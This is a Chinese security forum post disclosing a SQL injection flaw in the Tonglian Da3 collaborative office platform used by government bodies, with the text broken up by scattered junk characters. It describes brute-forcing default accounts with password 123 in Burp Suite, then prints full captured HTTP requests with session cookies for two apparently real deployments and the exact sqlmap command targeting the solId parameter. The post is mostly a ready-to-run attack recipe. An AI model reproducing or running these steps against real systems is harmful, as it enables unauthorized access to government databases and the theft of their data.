找回密码
 立即注册
查看: 1669|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 L5 A5 S, f/ m
9 ? c! b, G/ }) Z _

% @9 L: ^3 O6 P9 U. v+ L: r

) _1 r% r D3 F5 i; e 平台简介: 1 M1 G( R$ Q3 E6 S

7 K3 X* ?, _: _' l+ A

1 n: ~9 W* M+ T- Y8 b  0 C9 A$ p' [, t# u3 W

: j a. c! a5 k1 I4 O

: d5 J5 i$ A1 z 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& ?) K s- u: g$ v1 U5 B: X同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ K Z1 _6 V9 G& }7 M1 `同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 4 m7 T9 t+ b0 {, o' ?% B

: V* z; y+ y) M

) A$ w% \( U7 B   $ F: X0 l$ x/ l3 G0 U

( S) M, u0 a- l2 w8 @6 r

: p0 k, F; z7 |& o0 W0 [) ^) W 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: , |' \5 _0 [ |. @" A- ^

- S4 b# p* R8 o2 v/ x8 L

" O: O0 U7 `9 m+ L. d( Q+ ~   4 F0 H4 O( X' F9 B2 f; V

, K0 h- q- ~; E8 I1 q

8 O& d: \7 b% f' p4 t3 O F4 a http://1.1.1.1:7197/cap-aco/#(案例2-) $ M1 t0 q: t1 I, S5 {

$ ]. @7 O4 [* [

5 \7 _" c3 T$ v3 o) j http://www.XXOO.com (案例1-官网网站)& d5 b4 O/ n+ ?) `1 C2 w) e+ b

" A- p4 A2 \( H" \

2 x$ Y3 ~6 S' X/ w. J2 m  0 Q% V9 d5 w; @$ X! b7 _0 _

. ~; _) E: G$ g% ]* q3 H

8 f" \: s2 p" H( S5 p 漏洞详情:% M/ @* V* o, c- p5 }

$ e/ g4 F- C: v! }! E$ U

P) G% m) P. y! S  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 , b$ ~( Y2 w# j

2 |! E9 c3 I$ `: ]8 a

2 g8 Q& w/ v7 u; M% ^7 H      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:& ^: w/ N/ ?. U- i, ]4 A! i

; x y+ g& g/ b# i4 d' ], q! @

1 ^9 f$ P/ H+ h/ N" t   * L7 L. _' X; p

6 H/ p! Q* x# S3 p9 L$ ?

( ~8 t" H2 v: M& [" O  9 m" s; L: Q2 g+ q: p

. W7 P' F& a, c* d) ?9 r& l

- ]+ M+ t/ E9 ^* X, H3 e status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: 3 j# H e7 {, J$ j, |4 b2 m& J

+ ?# n# S) V$ c( B

" D& A+ [; Y- V4 q! x, N3 @ 1、案例1-官方网站 , c& g% W; s8 ]0 z- e7 o

/ n( ?; i: p7 L" O

5 p4 i% G' ?4 |! f) s GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 ) f/ s d K p* f( X

& |) z s. j9 u& N, y

: i1 U3 y/ r! U1 G Host: www.XXOO.com $ x& `1 U: n# d- a; z

" S& Y. T3 O5 }" I7 w( i

3 @% g% |2 L2 d$ }, R, ] Proxy-Connection: Keep-Alive " h n) Y! l, m+ q( f

* U0 P. y" R3 A( m' |& T% {0 P$ a) s

N4 t4 z5 I6 a. B Accept: application/json, text/javascript, */*; q=0.013 p$ B/ E8 t# p9 _% p

1 B& G( ]- z( E: g; g3 j- ]5 H

; x; m6 y$ H9 D8 Y5 V Accept-Language: zh-CN9 p/ h1 U3 G+ Z& B' q

6 t7 S/ G, W; r3 o" V: a6 Q, D8 S, X

T( C8 h; k7 q ^" N7 B Content-Type: application/json 7 o9 ^ x4 T; P1 L

- t1 Z, M: M* ?1 K

P1 n; _0 a8 l- K& f) p; C User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 6 r& a6 b" ?. P2 q; c0 \

[% `- V. V# i* o1 q

4 E) x3 `' ] R0 K$ d% k# W X-Requested-With: XMLHttpRequest p* N& k/ H) d3 ^2 ?& f

! r& S- H) F; k5 G1 F# A7 G4 f' F

! Y' j8 w/ `/ K" _3 q Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, s4 ^/ h; d( k% P$ G) [7 r

4 B4 B( G& V% M0 D O7 H

% s) H* j1 [+ ^; _- b3 | Accept-Encoding: gzip, deflate, sdch ) S& W# N1 H2 W% `" S

2 o" q) v+ n2 p( U9 o

2 p8 \1 U3 b( r# h Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( f( W" @. d9 o. d8 }5 d( e# l. N5 @2 B

$ E- d! Y5 f& _( n; c2 q

9 Y ]+ \0 X: [5 r/ B7 t9 q! V$ y 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 9 j2 n. v4 i. u

6 c' C+ w1 A- s# r: F

/ u. i1 U4 {) U/ f1 c( e1 `! z   5 p. C# n' D# K1 {% C2 Y

- s6 @, k( s; {" u7 }$ j, i% X0 g

7 U- Z+ l: O4 u; G1 W   & M( w2 W0 ?/ S5 U

* U8 o$ q2 ?2 {

% n9 j. I, E+ n6 A  & k+ q( \ U; ^ W- P9 g8 Z

) `! C; _( I" u: H6 v

0 A Y5 i0 d6 O8 C- |  % T. K: m7 {/ [

& ]4 q( h; b1 V2 [: m2 ^

0 W8 f, e1 F6 J9 P4 L' w2 }  , O! [! C# m4 L

l, M6 d c6 v

$ d+ u. _2 S5 `/ M' ~- i 2、案例2-某天河云平台 8 b6 N, I- Q8 n: D1 M; c" q( G" y

# u, l0 a& K) q( X: V4 W

9 G6 S& K8 ^& k2 V$ q+ R! g% a GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1# g, O0 ^: g) p q, W4 x8 \" a1 N* e, S/ p

5 V" R( E6 @1 T# ~" G9 ~

( p% E, R% z9 X1 g% G9 B Host: 1.1.1.:7197& N9 y, n+ V' @8 i" ^. t* x* I

6 ~6 }5 j2 J/ u2 l. I& A1 v

; E; H1 h! `5 O; C g, z, M1 \5 c Accept: application/json, text/javascript, */*; q=0.01 , ?1 O6 W; O) S9 @

: d! m9 s' N+ h9 g/ z: u

6 f- ]( ~! ]4 S" C: W0 Y0 i- @ X-Requested-With: XMLHttpRequest- Z$ z3 q. j1 ~ A+ ]# a

1 V# @/ Z/ @: T [/ F3 I

1 d+ m# T; N+ L9 g User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0/ h6 O/ e3 t2 c" F

6 w- e4 L. d v% p. {; J( A9 p

! j% r+ n# P7 N/ E6 N& p! R1 o( L Content-Type: application/json, U9 e7 _! i3 _) ^% u* l- G4 X% {1 G

! B6 x, j; n& z

6 q6 M2 B' a# y# x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008" _, a; e9 s x2 b. g

5 E/ @. T% k1 e( ^2 O. u

0 o1 `* C6 |! t9 I: y: e Accept-Language: zh-CN,zh;q=0.8* R/ s7 J/ Z9 W" R5 Z# X ?9 w

) `+ Y3 S* N8 X+ y& Z2 E7 G6 b; G6 w

1 I! m! K) P: [& k( ]" }$ X( ?( o; B1 W Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1% m. T3 j5 o6 }$ \3 M6 o/ y$ E

9 f6 F, e* Q T r; L- b# v

+ y; m R: s9 L# v Connection: close $ x0 }& E/ T* j" h4 G1 T% f/ a& M" a

+ A7 r/ i8 w( J/ m' o5 A4 v- q

3 d2 a* k& N4 y/ P3 ` 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 3 O2 |/ L0 a b, W

' W9 ?( Z# e5 r

6 S/ ~) R1 L" Y4 S9 k   3 n4 J; H5 T" v. r0 }" K

% t8 d! r/ f! W4 S2 N+ D: B

. ~1 ]" o" B/ O7 M
) c1 t$ H5 `" \* p6 d2 e& I, A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表